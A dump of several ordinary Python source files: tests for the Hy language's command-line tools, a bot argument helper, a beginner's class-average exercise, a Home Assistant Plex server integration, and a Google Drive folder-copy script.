ext | sha | content
---|---|---|
py | 1a32e01ee80a59c41d5cc81611cb2b568ed1c691 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2018 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
import os
import re
import shlex
import subprocess
import pytest
from hy._compat import builtins
from hy.importer import get_bytecode_path
hy_dir = os.environ.get('HY_DIR', '')
def hr(s=""):
return "hy --repl-output-fn=hy.contrib.hy-repr.hy-repr " + s
def run_cmd(cmd, stdin_data=None, expect=0, dontwritebytecode=False):
env = dict(os.environ)
if dontwritebytecode:
env["PYTHONDONTWRITEBYTECODE"] = "1"
else:
env.pop("PYTHONDONTWRITEBYTECODE", None)
cmd = shlex.split(cmd)
cmd[0] = os.path.join(hy_dir, cmd[0])
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
shell=False,
env=env)
output = p.communicate(input=stdin_data)
assert p.wait() == expect
return output
def rm(fpath):
try:
os.remove(fpath)
except (IOError, OSError):
try:
os.rmdir(fpath)
except (IOError, OSError):
pass
def test_bin_hy():
run_cmd("hy", "")
def test_bin_hy_stdin():
output, _ = run_cmd("hy", '(koan)')
assert "monk" in output
output, _ = run_cmd("hy --spy", '(koan)')
assert "monk" in output
assert "\n Ummon" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd("hy --spy", '(foof)')
assert "foof()" in output
def test_bin_hy_stdin_multiline():
output, _ = run_cmd("hy", '(+ "a" "b"\n"c" "d")')
assert "'abcd'" in output
def test_bin_hy_history():
output, _ = run_cmd("hy", '''(+ "a" "b")
(+ "c" "d")
(+ "e" "f")
(.format "*1: {}, *2: {}, *3: {}," *1 *2 *3)''')
assert "'*1: ef, *2: cd, *3: ab,'" in output
output, _ = run_cmd("hy", '''(raise (Exception "TEST ERROR"))
(+ "err: " (str *e))''')
assert "'err: TEST ERROR'" in output
def test_bin_hy_stdin_comments():
_, err_empty = run_cmd("hy", '')
output, err = run_cmd("hy", '(+ "a" "b") ; "c"')
assert "'ab'" in output
assert err == err_empty
_, err = run_cmd("hy", '; 1')
assert err == err_empty
def test_bin_hy_stdin_assignment():
# If the last form is an assignment, don't print the value.
output, _ = run_cmd("hy", '(setv x (+ "A" "Z"))')
assert "AZ" not in output
output, _ = run_cmd("hy", '(setv x (+ "A" "Z")) (+ "B" "Y")')
assert "AZ" not in output
assert "BY" in output
output, _ = run_cmd("hy", '(+ "B" "Y") (setv x (+ "A" "Z"))')
assert "AZ" not in output
assert "BY" not in output
def test_bin_hy_stdin_as_arrow():
# https://github.com/hylang/hy/issues/1255
output, _ = run_cmd("hy", "(as-> 0 it (inc it) (inc it))")
assert re.match(r"=>\s+2L?\s+=>", output)
def test_bin_hy_stdin_error_underline_alignment():
_, err = run_cmd("hy", "(defmacro mabcdefghi [x] x)\n(mabcdefghi)")
assert "\n (mabcdefghi)\n ^----------^" in err
def test_bin_hy_stdin_except_do():
# https://github.com/hylang/hy/issues/533
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "hello"))') # noqa
assert "hello" in output
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "aaa" "bbb" "ccc"))') # noqa
assert "aaa" not in output
assert "bbb" not in output
assert "ccc" in output
output, _ = run_cmd("hy", '(if True (do "xxx" "yyy" "zzz"))')
assert "xxx" not in output
assert "yyy" not in output
assert "zzz" in output
def test_bin_hy_stdin_unlocatable_hytypeerror():
# https://github.com/hylang/hy/issues/1412
# The chief test of interest here is the returncode assertion
# inside run_cmd.
_, err = run_cmd("hy", """
(import hy.errors)
(raise (hy.errors.HyTypeError '[] (+ "A" "Z")))""")
assert "AZ" in err
def test_bin_hy_stdin_bad_repr():
# https://github.com/hylang/hy/issues/1389
output, err = run_cmd("hy", """
(defclass BadRepr [] (defn __repr__ [self] (/ 0)))
(BadRepr)
(+ "A" "Z")""")
assert "ZeroDivisionError" in err
assert "AZ" in output
def test_bin_hy_stdin_hy_repr():
output, _ = run_cmd("hy", '(+ [1] [2])')
assert "[1, 2]" in output.replace('L', '')
output, _ = run_cmd(hr(), '(+ [1] [2])')
assert "[1 2]" in output
output, _ = run_cmd(hr("--spy"), '(+ [1] [2])')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
assert "[1 2]" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd(hr("--spy"), '(+ [1] [2] (foof))')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
def test_bin_hy_ignore_python_env():
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -m tests.resources.bin.printenv")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy tests/resources/bin/printenv.hy")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -E -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E -m tests.resources.bin.printenv")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E tests/resources/bin/printenv.hy")
assert "PYTHONTEST" not in output
def test_bin_hy_cmd():
output, _ = run_cmd("hy -c \"(koan)\"")
assert "monk" in output
_, err = run_cmd("hy -c \"(koan\"", expect=1)
assert "Premature end of input" in err
def test_bin_hy_icmd():
output, _ = run_cmd("hy -i \"(koan)\"", "(ideas)")
assert "monk" in output
assert "figlet" in output
def test_bin_hy_icmd_file():
output, _ = run_cmd("hy -i resources/icmd_test_file.hy", "(ideas)")
assert "Hy!" in output
def test_bin_hy_icmd_and_spy():
output, _ = run_cmd("hy -i \"(+ [] [])\" --spy", "(+ 1 1)")
assert "[] + []" in output
def test_bin_hy_missing_file():
_, err = run_cmd("hy foobarbaz", expect=2)
assert "No such file" in err
def test_bin_hy_file_with_args():
assert "usage" in run_cmd("hy tests/resources/argparse_ex.hy -h")[0]
assert "got c" in run_cmd("hy tests/resources/argparse_ex.hy -c bar")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo -c bar")[0] # noqa
def test_bin_hyc():
_, err = run_cmd("hyc", expect=2)
assert "usage" in err
output, _ = run_cmd("hyc -h")
assert "usage" in output
path = "tests/resources/argparse_ex.hy"
output, _ = run_cmd("hyc " + path)
assert "Compiling" in output
assert os.path.exists(get_bytecode_path(path))
rm(get_bytecode_path(path))
def test_bin_hyc_missing_file():
_, err = run_cmd("hyc foobarbaz", expect=2)
assert "[Errno 2]" in err
def test_bin_hy_builtins():
# hy.cmdline replaces builtins.exit and builtins.quit
# for use by hy's repl.
import hy.cmdline # NOQA
# this test will fail if run from IPython because IPython deletes
# builtins.exit and builtins.quit
assert str(builtins.exit) == "Use (exit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.exit) is hy.cmdline.HyQuitter
assert str(builtins.quit) == "Use (quit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.quit) is hy.cmdline.HyQuitter
def test_bin_hy_main():
output, _ = run_cmd("hy tests/resources/bin/main.hy")
assert "Hello World" in output
def test_bin_hy_main_args():
output, _ = run_cmd("hy tests/resources/bin/main.hy test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_main_exitvalue():
run_cmd("hy tests/resources/bin/main.hy exit1", expect=1)
def test_bin_hy_no_main():
output, _ = run_cmd("hy tests/resources/bin/nomain.hy")
assert "This Should Still Work" in output
@pytest.mark.parametrize('scenario', [
"normal", "prevent_by_force", "prevent_by_env"])
@pytest.mark.parametrize('cmd_fmt', [
'hy {fpath}', 'hy -m {modname}', "hy -c '(import {modname})'"])
def test_bin_hy_byte_compile(scenario, cmd_fmt):
modname = "tests.resources.bin.bytecompile"
fpath = modname.replace(".", "/") + ".hy"
cmd = cmd_fmt.format(**locals())
rm(get_bytecode_path(fpath))
if scenario == "prevent_by_force":
# Keep Hy from being able to byte-compile the module by
# creating a directory at the target location.
os.mkdir(get_bytecode_path(fpath))
# Whether or not we can byte-compile the module, we should be able
# to run it.
output, _ = run_cmd(cmd, dontwritebytecode=scenario == "prevent_by_env")
assert "Hello from macro" in output
assert "The macro returned: boink" in output
if scenario == "normal":
# That should've byte-compiled the module.
assert os.path.exists(get_bytecode_path(fpath))
elif scenario == "prevent_by_env":
# No byte-compiled version should've been created.
assert not os.path.exists(get_bytecode_path(fpath))
# When we run the same command again, and we've byte-compiled the
# module, the byte-compiled version should be run instead of the
# source, in which case the macro shouldn't be run.
output, _ = run_cmd(cmd)
assert ("Hello from macro" in output) ^ (scenario == "normal")
assert "The macro returned: boink" in output
def test_bin_hy_module_main():
output, _ = run_cmd("hy -m tests.resources.bin.main")
assert "Hello World" in output
def test_bin_hy_module_main_args():
output, _ = run_cmd("hy -m tests.resources.bin.main test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_module_main_exitvalue():
run_cmd("hy -m tests.resources.bin.main exit1", expect=1)
def test_bin_hy_module_no_main():
output, _ = run_cmd("hy -m tests.resources.bin.nomain")
assert "This Should Still Work" in output
|
py | 1a32e021028be47b2bb507319f95eb726ab33659 | # MIT License
# Copyright (c) 2022 Zenitsu Prjkt™
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
def get_arg(message):
"""Return everything after the leading command in the message text, or "" if no arguments were given."""
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
|
py | 1a32e077414381704f2c07ade73133b29c2efcc1 | # Marcelo Campos de Medeiros
# ADS UNIFIP
# Repetition Structures
# 25/03/2020
'''
27 - Write a program that computes the average number of students per class.
To do this, ask for the number of classes and the number of students
in each class. A class cannot have more than 40 students.
'''
print('=' * 40)
print('{:=^40}'.format(" 'AVERAGE NUMBER OF STUDENTS PER CLASS' "))
print('=' * 40, '\n')
turmas = int(input('How many classes are there: '))
soma = 0
for c in range(1, turmas + 1):
# repeat the prompt while more than 40 students are entered
while True:
alunos = int(input(f'How many students are in class {c}: '))
if alunos <= 40:
break
else:
print('A class cannot have more than 40 students. Enter the value again.')
soma += alunos
print(f'The school has {turmas} classes\n'
f'with a total of {soma} students.\n'
f'So the average number of students per class is {soma / turmas:.2f}') |
py | 1a32e08bcf6aa1922a6682412d4ec4cf8d9cda47 | """Shared class to maintain Plex server instances."""
import logging
import ssl
import time
from urllib.parse import urlparse
from plexapi.exceptions import NotFound, Unauthorized
import plexapi.myplex
import plexapi.playqueue
import plexapi.server
from requests import Session
import requests.exceptions
from homeassistant.components.media_player import DOMAIN as MP_DOMAIN
from homeassistant.components.media_player.const import (
MEDIA_TYPE_EPISODE,
MEDIA_TYPE_MUSIC,
MEDIA_TYPE_PLAYLIST,
MEDIA_TYPE_VIDEO,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_TOKEN, CONF_URL, CONF_VERIFY_SSL
from homeassistant.core import callback
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .const import (
CONF_IGNORE_NEW_SHARED_USERS,
CONF_IGNORE_PLEX_WEB_CLIENTS,
CONF_MONITORED_USERS,
CONF_SERVER,
CONF_USE_EPISODE_ART,
DEBOUNCE_TIMEOUT,
DEFAULT_VERIFY_SSL,
DOMAIN,
PLAYER_SOURCE,
PLEX_NEW_MP_SIGNAL,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL,
PLEX_UPDATE_SENSOR_SIGNAL,
PLEXTV_THROTTLE,
X_PLEX_DEVICE_NAME,
X_PLEX_PLATFORM,
X_PLEX_PRODUCT,
X_PLEX_VERSION,
)
from .errors import NoServersFound, ServerNotSpecified, ShouldUpdateConfigEntry
_LOGGER = logging.getLogger(__name__)
# Set default headers sent by plexapi
plexapi.X_PLEX_DEVICE_NAME = X_PLEX_DEVICE_NAME
plexapi.X_PLEX_PLATFORM = X_PLEX_PLATFORM
plexapi.X_PLEX_PRODUCT = X_PLEX_PRODUCT
plexapi.X_PLEX_VERSION = X_PLEX_VERSION
class PlexServer:
"""Manages a single Plex server connection."""
def __init__(self, hass, server_config, known_server_id=None, options=None):
"""Initialize a Plex server instance."""
self.hass = hass
self._plex_account = None
self._plex_server = None
self._created_clients = set()
self._known_clients = set()
self._known_idle = set()
self._url = server_config.get(CONF_URL)
self._token = server_config.get(CONF_TOKEN)
self._server_name = server_config.get(CONF_SERVER)
self._verify_ssl = server_config.get(CONF_VERIFY_SSL, DEFAULT_VERIFY_SSL)
self._server_id = known_server_id
self.options = options
self.server_choice = None
self._accounts = []
self._owner_username = None
self._plextv_clients = None
self._plextv_client_timestamp = 0
self._plextv_device_cache = {}
self._use_plex_tv = self._token is not None
self._version = None
self.async_update_platforms = Debouncer(
hass,
_LOGGER,
cooldown=DEBOUNCE_TIMEOUT,
immediate=True,
function=self._async_update_platforms,
).async_call
# Header conditionally added as it is not available in config entry v1
if CONF_CLIENT_ID in server_config:
plexapi.X_PLEX_IDENTIFIER = server_config[CONF_CLIENT_ID]
plexapi.myplex.BASE_HEADERS = plexapi.reset_base_headers()
plexapi.server.BASE_HEADERS = plexapi.reset_base_headers()
@property
def account(self):
"""Return a MyPlexAccount instance."""
if not self._plex_account and self._use_plex_tv:
try:
self._plex_account = plexapi.myplex.MyPlexAccount(token=self._token)
except Unauthorized:
self._use_plex_tv = False
_LOGGER.error("Not authorized to access plex.tv with provided token")
raise
return self._plex_account
def plextv_clients(self):
"""Return available clients linked to Plex account."""
if self.account is None:
return []
now = time.time()
if now - self._plextv_client_timestamp > PLEXTV_THROTTLE:
self._plextv_client_timestamp = now
self._plextv_clients = [
x
for x in self.account.resources()
if "player" in x.provides and x.presence
]
_LOGGER.debug(
"Current available clients from plex.tv: %s", self._plextv_clients
)
return self._plextv_clients
def connect(self):
"""Connect to a Plex server directly, obtaining direct URL if necessary."""
config_entry_update_needed = False
def _connect_with_token():
available_servers = [
(x.name, x.clientIdentifier)
for x in self.account.resources()
if "server" in x.provides
]
if not available_servers:
raise NoServersFound
if not self._server_name and len(available_servers) > 1:
raise ServerNotSpecified(available_servers)
self.server_choice = (
self._server_name if self._server_name else available_servers[0][0]
)
self._plex_server = self.account.resource(self.server_choice).connect(
timeout=10
)
def _connect_with_url():
session = None
if self._url.startswith("https") and not self._verify_ssl:
session = Session()
session.verify = False
self._plex_server = plexapi.server.PlexServer(
self._url, self._token, session
)
def _update_plexdirect_hostname():
matching_servers = [
x.name
for x in self.account.resources()
if x.clientIdentifier == self._server_id
]
if matching_servers:
self._plex_server = self.account.resource(matching_servers[0]).connect(
timeout=10
)
return True
_LOGGER.error("Attempt to update plex.direct hostname failed")
return False
if self._url:
try:
_connect_with_url()
except requests.exceptions.SSLError as error:
while error and not isinstance(error, ssl.SSLCertVerificationError):
error = error.__context__ # pylint: disable=no-member
if isinstance(error, ssl.SSLCertVerificationError):
domain = urlparse(self._url).netloc.split(":")[0]
if domain.endswith("plex.direct") and error.args[0].startswith(
f"hostname '{domain}' doesn't match"
):
_LOGGER.warning(
"Plex SSL certificate's hostname changed, updating."
)
if _update_plexdirect_hostname():
config_entry_update_needed = True
else:
raise Unauthorized(
"New certificate cannot be validated with provided token"
)
else:
raise
else:
raise
else:
_connect_with_token()
try:
system_accounts = self._plex_server.systemAccounts()
except Unauthorized:
_LOGGER.warning(
"Plex account has limited permissions, shared account filtering will not be available."
)
else:
self._accounts = [
account.name for account in system_accounts if account.name
]
_LOGGER.debug("Linked accounts: %s", self.accounts)
owner_account = [
account.name for account in system_accounts if account.accountID == 1
]
if owner_account:
self._owner_username = owner_account[0]
_LOGGER.debug("Server owner found: '%s'", self._owner_username)
self._version = self._plex_server.version
if config_entry_update_needed:
raise ShouldUpdateConfigEntry
@callback
def async_refresh_entity(self, machine_identifier, device, session):
"""Forward refresh dispatch to media_player."""
unique_id = f"{self.machine_identifier}:{machine_identifier}"
_LOGGER.debug("Refreshing %s", unique_id)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL.format(unique_id),
device,
session,
)
def _fetch_platform_data(self):
"""Fetch all data from the Plex server in a single method."""
return (
self._plex_server.clients(),
self._plex_server.sessions(),
self.plextv_clients(),
)
async def _async_update_platforms(self):
"""Update the platform entities."""
_LOGGER.debug("Updating devices")
available_clients = {}
ignored_clients = set()
new_clients = set()
monitored_users = self.accounts
known_accounts = set(self.option_monitored_users)
if known_accounts:
monitored_users = {
user
for user in self.option_monitored_users
if self.option_monitored_users[user]["enabled"]
}
if not self.option_ignore_new_shared_users:
for new_user in self.accounts - known_accounts:
monitored_users.add(new_user)
try:
devices, sessions, plextv_clients = await self.hass.async_add_executor_job(
self._fetch_platform_data
)
except (
plexapi.exceptions.BadRequest,
requests.exceptions.RequestException,
) as ex:
_LOGGER.error(
"Could not connect to Plex server: %s (%s)", self.friendly_name, ex
)
return
def process_device(source, device):
self._known_idle.discard(device.machineIdentifier)
available_clients.setdefault(device.machineIdentifier, {"device": device})
available_clients[device.machineIdentifier].setdefault(
PLAYER_SOURCE, source
)
if device.machineIdentifier not in ignored_clients:
if self.option_ignore_plexweb_clients and device.product == "Plex Web":
ignored_clients.add(device.machineIdentifier)
if device.machineIdentifier not in self._known_clients:
_LOGGER.debug(
"Ignoring %s %s: %s",
"Plex Web",
source,
device.machineIdentifier,
)
return
if device.machineIdentifier not in (
self._created_clients | ignored_clients | new_clients
):
new_clients.add(device.machineIdentifier)
_LOGGER.debug(
"New %s from %s: %s",
device.product,
source,
device.machineIdentifier,
)
for device in devices:
process_device("PMS", device)
def connect_to_resource(resource):
"""Connect to a plex.tv resource and return a Plex client."""
client_id = resource.clientIdentifier
if client_id in self._plextv_device_cache:
return self._plextv_device_cache[client_id]
client = None
try:
client = resource.connect(timeout=3)
_LOGGER.debug("plex.tv resource connection successful: %s", client)
except NotFound:
_LOGGER.error("plex.tv resource connection failed: %s", resource.name)
self._plextv_device_cache[client_id] = client
return client
for plextv_client in plextv_clients:
if plextv_client.clientIdentifier not in available_clients:
device = await self.hass.async_add_executor_job(
connect_to_resource, plextv_client
)
if device:
process_device("plex.tv", device)
for session in sessions:
if session.TYPE == "photo":
_LOGGER.debug("Photo session detected, skipping: %s", session)
continue
session_username = session.usernames[0]
for player in session.players:
if session_username and session_username not in monitored_users:
ignored_clients.add(player.machineIdentifier)
_LOGGER.debug(
"Ignoring %s client owned by '%s'",
player.product,
session_username,
)
continue
process_device("session", player)
available_clients[player.machineIdentifier]["session"] = session
new_entity_configs = []
for client_id, client_data in available_clients.items():
if client_id in ignored_clients:
continue
if client_id in new_clients:
new_entity_configs.append(client_data)
self._created_clients.add(client_id)
else:
self.async_refresh_entity(
client_id, client_data["device"], client_data.get("session")
)
self._known_clients.update(new_clients | ignored_clients)
idle_clients = (
self._known_clients - self._known_idle - ignored_clients
).difference(available_clients)
for client_id in idle_clients:
self.async_refresh_entity(client_id, None, None)
self._known_idle.add(client_id)
self._plextv_device_cache.pop(client_id, None)
if new_entity_configs:
async_dispatcher_send(
self.hass,
PLEX_NEW_MP_SIGNAL.format(self.machine_identifier),
new_entity_configs,
)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_SENSOR_SIGNAL.format(self.machine_identifier),
sessions,
)
@property
def plex_server(self):
"""Return the plexapi PlexServer instance."""
return self._plex_server
@property
def accounts(self):
"""Return accounts associated with the Plex server."""
return set(self._accounts)
@property
def owner(self):
"""Return the Plex server owner username."""
return self._owner_username
@property
def version(self):
"""Return the version of the Plex server."""
return self._version
@property
def friendly_name(self):
"""Return name of connected Plex server."""
return self._plex_server.friendlyName
@property
def machine_identifier(self):
"""Return unique identifier of connected Plex server."""
return self._plex_server.machineIdentifier
@property
def url_in_use(self):
"""Return URL used for connected Plex server."""
return self._plex_server._baseurl # pylint: disable=protected-access
@property
def option_ignore_new_shared_users(self):
"""Return ignore_new_shared_users option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_NEW_SHARED_USERS, False)
@property
def option_use_episode_art(self):
"""Return use_episode_art option."""
return self.options[MP_DOMAIN].get(CONF_USE_EPISODE_ART, False)
@property
def option_monitored_users(self):
"""Return dict of monitored users option."""
return self.options[MP_DOMAIN].get(CONF_MONITORED_USERS, {})
@property
def option_ignore_plexweb_clients(self):
"""Return ignore_plex_web_clients option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_PLEX_WEB_CLIENTS, False)
@property
def library(self):
"""Return library attribute from server object."""
return self._plex_server.library
def playlist(self, title):
"""Return playlist from server object."""
return self._plex_server.playlist(title)
def create_playqueue(self, media, **kwargs):
"""Create playqueue on Plex server."""
return plexapi.playqueue.PlayQueue.create(self._plex_server, media, **kwargs)
def fetch_item(self, item):
"""Fetch item from Plex server."""
return self._plex_server.fetchItem(item)
def lookup_media(self, media_type, **kwargs):
"""Lookup a piece of media."""
media_type = media_type.lower()
if media_type == DOMAIN:
key = kwargs["plex_key"]
try:
return self.fetch_item(key)
except NotFound:
_LOGGER.error("Media for key %s not found", key)
return None
if media_type == MEDIA_TYPE_PLAYLIST:
try:
playlist_name = kwargs["playlist_name"]
return self.playlist(playlist_name)
except KeyError:
_LOGGER.error("Must specify 'playlist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Playlist '%s' not found", playlist_name,
)
return None
try:
library_name = kwargs["library_name"]
library_section = self.library.section(library_name)
except KeyError:
_LOGGER.error("Must specify 'library_name' for this search")
return None
except NotFound:
_LOGGER.error("Library '%s' not found", library_name)
return None
def lookup_music():
"""Search for music and return a Plex media object."""
album_name = kwargs.get("album_name")
track_name = kwargs.get("track_name")
track_number = kwargs.get("track_number")
try:
artist_name = kwargs["artist_name"]
artist = library_section.get(artist_name)
except KeyError:
_LOGGER.error("Must specify 'artist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Artist '%s' not found in '%s'", artist_name, library_name
)
return None
if album_name:
try:
album = artist.album(album_name)
except NotFound:
_LOGGER.error(
"Album '%s' by '%s' not found", album_name, artist_name
)
return None
if track_name:
try:
return album.track(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' on '%s' by '%s' not found",
track_name,
album_name,
artist_name,
)
return None
if track_number:
for track in album.tracks():
if int(track.index) == int(track_number):
return track
_LOGGER.error(
"Track %d on '%s' by '%s' not found",
track_number,
album_name,
artist_name,
)
return None
return album
if track_name:
try:
return artist.get(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' by '%s' not found", track_name, artist_name
)
return None
return artist
def lookup_tv():
"""Find TV media and return a Plex media object."""
season_number = kwargs.get("season_number")
episode_number = kwargs.get("episode_number")
try:
show_name = kwargs["show_name"]
show = library_section.get(show_name)
except KeyError:
_LOGGER.error("Must specify 'show_name' for this search")
return None
except NotFound:
_LOGGER.error("Show '%s' not found in '%s'", show_name, library_name)
return None
if not season_number:
return show
try:
season = show.season(int(season_number))
except NotFound:
_LOGGER.error(
"Season %d of '%s' not found", season_number, show_name,
)
return None
if not episode_number:
return season
try:
return season.episode(episode=int(episode_number))
except NotFound:
_LOGGER.error(
"Episode not found: %s - S%sE%s",
show_name,
str(season_number).zfill(2),
str(episode_number).zfill(2),
)
return None
if media_type == MEDIA_TYPE_MUSIC:
return lookup_music()
if media_type == MEDIA_TYPE_EPISODE:
return lookup_tv()
if media_type == MEDIA_TYPE_VIDEO:
try:
video_name = kwargs["video_name"]
return library_section.get(video_name)
except KeyError:
_LOGGER.error("Must specify 'video_name' for this search")
except NotFound:
_LOGGER.error(
"Movie '%s' not found in '%s'", video_name, library_name,
)
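# --- Illustrative sketch only (not part of the integration): once Home Assistant has
# constructed and connected a PlexServer instance, `lookup_media` could be called
# roughly as below. The library, show, and artist names are placeholders. ---
#
#   episode = plex_server.lookup_media(
#       MEDIA_TYPE_EPISODE,
#       library_name="TV Shows",
#       show_name="Some Show",
#       season_number=1,
#       episode_number=2,
#   )
#   track = plex_server.lookup_media(
#       MEDIA_TYPE_MUSIC,
#       library_name="Music",
#       artist_name="Some Artist",
#       album_name="Some Album",
#       track_number=3,
#   )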
|
py | 1a32e0c22e295e4d79732d11656b55de218cae8c | from __future__ import print_function
import datetime
import time
import httplib2
import os
import sys
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
from oauth2client import file
from logbook import Logger, FileHandler, StreamHandler
log = Logger('copy-google-drive-folder')
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser])
# add in our specific command line requirements
flags.add_argument('--source-folder_id', '-f', type=str, required=True,
help="Source Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--target-folder_id', '-t', type=str, required=True,
help="Target Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--page-size', '-p', type=int, default=100,
help="Number of files in each page (defaults to 100)")
flags.add_argument('--start-page', '-s', type=int, default=1,
help="start from page N of the file listing (defaults to 1)")
flags.add_argument('--end-page', '-e', type=int, default=None,
help="stop paging at page N of the file listing (defaults to not stop before the end)")
flags.add_argument('--log-dir', '-l', type=str, help='Where to put log files', default='/tmp')
flags.add_argument('--log-level', type=str, help='Choose a log level', default='INFO')
args = flags.parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/drive-python-quickstart.json
# SCOPES = 'https://www.googleapis.com/auth/drive.metadata.readonly'
SCOPES = 'https://www.googleapis.com/auth/drive'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Copy Google Drive Folders'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'drive-copy-google-folders.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, args)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
log.info('Storing credentials to ' + credential_path)
return credentials
def ensure_trailing_slash(val):
if val[-1] != '/':
return "{}/".format(val)
return val
def main():
"""
Copy a folder from Source to Target
"""
log_filename = os.path.join(
args.log_dir,
'copy-google-drive-folder-{}.log'.format(os.path.basename(time.strftime('%Y%m%d-%H%M%S')))
)
# register some logging handlers
log_handler = FileHandler(
log_filename,
mode='w',
level=args.log_level,
bubble=True
)
stdout_handler = StreamHandler(sys.stdout, level=args.log_level, bubble=True)
with stdout_handler.applicationbound():
with log_handler.applicationbound():
log.info("Arguments: {}".format(args))
start = time.time()
log.info("starting at {}".format(time.strftime('%l:%M%p %Z on %b %d, %Y')))
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
drive_service = discovery.build('drive', 'v3', http=http)
# get the files in the specified folder.
files = drive_service.files()
request = files.list(
pageSize=args.page_size,
q="'{}' in parents".format(args.source_folder_id),
fields="nextPageToken, files(id, name, mimeType)"
)
page_counter = 0
file_counter = 0
while request is not None:
file_page = request.execute(http=http)
page_counter += 1
page_file_counter = 0 # reset the paging file counter
# determine the page at which to start processing.
if page_counter >= args.start_page:
log.info(u"######## Page {} ########".format(page_counter))
for this_file in file_page['files']:
file_counter += 1
page_file_counter += 1
log.info(u"#== Processing {} {} file number {} on page {}. {} files processed.".format(
this_file['mimeType'],
this_file['name'],
page_file_counter,
page_counter,
file_counter
))
# if not a folder
if this_file['mimeType'] != 'application/vnd.google-apps.folder':
# Copy the file
new_file = {'name': this_file['name']}  # Drive API v3 uses 'name' (the 'title' field was v2)
copied_file = drive_service.files().copy(fileId=this_file['id'], body=new_file).execute()
# move it to its new location
drive_service.files().update(
fileId=copied_file['id'],
addParents=args.target_folder_id,
removeParents=args.source_folder_id
).execute()
else:
log.info(u"Skipped Folder")
else:
log.info(u"Skipping Page {}".format(page_counter))
# stop if we have come to the last user specified page
if args.end_page and page_counter == args.end_page:
log.info(u"Finished paging at page {}".format(page_counter))
break
# request the next page of files
request = files.list_next(request, file_page)
log.info("Running time: {}".format(str(datetime.timedelta(seconds=(round(time.time() - start, 3))))))
log.info("Log written to {}:".format(log_filename))
if __name__ == '__main__':
main()
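# Example invocation (assumption: the script file name and folder IDs below are
# placeholders; the flags match the argparse definitions above):
#   python copy_google_drive_folder.py \
#       --source-folder_id <SOURCE_FOLDER_ID> \
#       --target-folder_id <TARGET_FOLDER_ID> \
#       --page-size 200 --log-level INFO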
|
py | 1a32e0c662c8657caf6e6188fae220df2ffb18dc | from pathlib import Path
